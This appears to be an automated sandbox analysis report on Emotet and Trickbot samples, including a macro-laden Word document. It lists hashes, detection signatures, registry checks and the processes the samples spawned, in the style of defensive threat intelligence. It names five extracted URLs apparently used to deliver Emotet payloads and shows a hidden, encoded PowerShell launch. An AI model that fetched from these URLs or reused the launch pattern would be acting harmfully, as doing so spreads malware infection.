Overview (scores)
- Static: 10
- client/202...st.exe (windows7-x64): 8
- client/202...st.exe (windows10-2004-x64): 10
- client/202...-2.doc (windows7-x64): 10
- client/202...-2.doc (windows10-2004-x64): 10
- client/202...on.exe (windows7-x64): 10
- client/202...on.exe (windows10-2004-x64): 10
- client/202...ro.exe (windows7-x64): 10
- client/202...ro.exe (windows10-2004-x64): 10
- client/gpu...3C.exe (windows7-x64): 10
- client/gpu...3C.exe (windows10-2004-x64): 10
- client/gpu...rt.exe (windows7-x64): 10
- client/gpu...rt.exe (windows10-2004-x64): 10
- dc/gpuheal...rt.exe (windows7-x64): 10
- dc/gpuheal...rt.exe (windows10-2004-x64): 10
Analysis
- max time kernel: 102s
- max time network: 137s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 20-12-2022 19:37
Behavioral tasks
- behavioral1: client/2020-01-14-Trickbot-gtag-mor75-retrieved-by-Emotet-infected-host.exe (resource win7-20220812-en)
- behavioral2: client/2020-01-14-Trickbot-gtag-mor75-retrieved-by-Emotet-infected-host.exe (resource win10v2004-20221111-en)
- behavioral3: client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc (resource win7-20220901-en)
- behavioral4: client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc (resource win10v2004-20221111-en)
- behavioral5: client/2020-01-14-follow-up-Emotet-binary-after-initial-infection.exe (resource win7-20220812-en)
- behavioral6: client/2020-01-14-follow-up-Emotet-binary-after-initial-infection.exe (resource win10v2004-20221111-en)
- behavioral7: client/2020-01-14-initial-Emotet-binary-retrieved-by-Word-macro.exe (resource win7-20221111-en)
- behavioral8: client/2020-01-14-initial-Emotet-binary-retrieved-by-Word-macro.exe (resource win10v2004-20220812-en)
- behavioral9: client/gpuhealth/GƆCCKX ↀↂ;;;;;;;;;;;;;;;;;;;ж;;;;;;;;;;;яЫФЦйвЫФв003423C.exe (resource win7-20220901-en)
- behavioral10: client/gpuhealth/GƆCCKX ↀↂ;;;;;;;;;;;;;;;;;;;ж;;;;;;;;;;;яЫФЦйвЫФв003423C.exe (resource win10v2004-20220812-en)
- behavioral11: client/gpuhealth/syrecrt.exe (resource win7-20220812-en)
- behavioral12: client/gpuhealth/syrecrt.exe (resource win10v2004-20220812-en)
- behavioral13: dc/gpuhealth/syrecrt.exe (resource win7-20221111-en)
General
- Target: client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc
- Size: 248KB
- MD5: 33285762e4d622f59232275df1f8c895
- SHA1: 9453e78df31d27a75141b298f256fb26c8cd473c
- SHA256: 7a8cb80805617a8ba3c67dca2a80527c17601869e833272758ea10ef5926b29f
- SHA512: 2fa25ab449522106249c7a62581148ee9a32d5aa0c0f7dd2a2f4fa79a8b2ac529ad287be84c95e8bc5b0f266307989874bdbaf9fd2ed5cb8c509093af8040231
- SSDEEP: 6144:p0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+RC/uY+KSX:p0E3dxtR/iU9mvUPMR+KSX
Malware Config
Extracted URLs:
- http://www.lakshmichowkusa.com/emailwishlist/g3B/
- http://adampettycreative.com/x92k25/387wj2/
- https://backerplanet.com/forum_posts/0i7/
- http://hebreoenlinea-chms.mx/wp-content/sW0yhVry/
- https://formaper.webinarbox.it/admin/Kb/
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powershell.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 220, pid_target 4592, process powershell.exe)
- Blocklisted process makes network request (7 IoCs)
  Processes: powershell.exe
  Flows 18, 20, 26, 28, 43, 54 and 56, all from pid 220 (powershell.exe)
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WINWORD.EXE)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WINWORD.EXE)
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes: WINWORD.EXE (pid 4092, 2 occurrences)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe (pid 220, 2 occurrences)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (pid 220), Token: SeDebugPrivilege
- Suspicious use of SetWindowsHookEx (8 IoCs)
  Processes: WINWORD.EXE (pid 4092, 8 occurrences)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\client\2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -w hidden -en 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
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Downloads (memory dumps)
- memory/220-139-0x00000193EC3E0000-0x00000193EC402000-memory.dmp (136KB)
- memory/220-143-0x00007FFB5F680000-0x00007FFB60141000-memory.dmp (10.8MB)
- memory/220-142-0x00007FFB5F680000-0x00007FFB60141000-memory.dmp (10.8MB)
- memory/220-141-0x00007FFB5F680000-0x00007FFB60141000-memory.dmp (10.8MB)
- memory/4092-140-0x00000207C9210000-0x00000207C9214000-memory.dmp (16KB)
- memory/4092-137-0x00007FFB49200000-0x00007FFB49210000-memory.dmp (64KB)
- memory/4092-138-0x00007FFB49200000-0x00007FFB49210000-memory.dmp (64KB)
- memory/4092-136-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-132-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-135-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-134-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-133-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-145-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-146-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-147-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)
- memory/4092-148-0x00007FFB4B6D0000-0x00007FFB4B6E0000-memory.dmp (64KB)